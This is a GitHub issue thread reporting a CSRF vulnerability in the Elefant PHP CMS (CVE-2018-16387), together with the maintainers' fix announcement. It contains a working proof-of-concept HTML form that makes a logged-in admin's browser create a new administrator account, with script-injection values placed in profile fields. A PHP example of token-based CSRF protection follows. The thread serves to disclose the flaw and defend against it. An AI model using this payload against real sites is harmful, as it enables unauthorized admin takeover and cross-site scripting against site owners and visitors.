jbroadway / elefant

Elefant, the refreshingly simple PHP CMS and web framework.
http://www.elefantcms.com
MIT License
208 stars 39 forks

There is a CSRF vulnerability that can add the administrator account #285

Closed hkzj closed 5 years ago

hkzj commented 5 years ago

After the administrator has logged in, open the following page. PoC: csrf.html (adds an admin):

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.59/user/add" method="POST">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="email" value="test&#64;qq&#46;com" />
      <input type="hidden" name="password" value="admin123" />
      <input type="hidden" name="verify&#95;pass" value="admin123" />
      <input type="hidden" name="type" value="admin" />
      <input type="hidden" name="company" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="title" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="about" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="fax" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="zip" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
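The PoC works because `/user/add` accepts any POST carrying the right field names, with nothing tying the request to the admin's own form. A synchronizer-token check that would reject such a request, as an added PHP example (not Elefant's actual fix; the `_token` field name, the `csrf_token`/`csrf_check` helpers and session-based storage are assumptions):

```php
<?php
// Added example, not Elefant's own code. Route and field names come from the
// PoC in the issue; helper names and the "_token" field are assumptions.

// Defense in depth: a SameSite cookie stops most cross-site POSTs from
// carrying the session at all (PHP 7.3+ array form).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one random token per session and reuse it across the admin's forms.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only if the submitted token matches the session token.
// hash_equals() compares in constant time; a missing token fails closed.
function csrf_check(array $post): bool {
    if (empty($_SESSION['csrf_token']) || empty($post['_token'])) {
        return false;
    }
    return is_string($post['_token'])
        && hash_equals($_SESSION['csrf_token'], $post['_token']);
}

// Hardened handler: reject before touching the user table. The PoC form
// above sends no _token, so it stops here with a 403.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... only now validate name/email/password/type and create the user ...
}

// The legitimate admin form embeds the token as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form action="/user/add" method="POST">'
   . '<input type="hidden" name="_token" value="' . $token . '" />'
   . '<input type="text" name="name" />'
   . '<input type="submit" value="Add user" />'
   . '</form>';
```

Failed checks are worth logging with the request's Origin/Referer and session id, since a burst of 403s on `/user/add` is the detection signal for an attempt like the one reported here.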
lux commented 5 years ago

Hi, thanks for reporting this! I just pushed a commit that fixes this here, but I haven't pushed an update out yet because I want to go through to make sure there aren't others first.

jbroadway commented 5 years ago

Just pushed update 2.0.5 that fixes this. Thanks again for reporting it!

fgeek commented 5 years ago

CVE-2018-16387 has been assigned for this issue.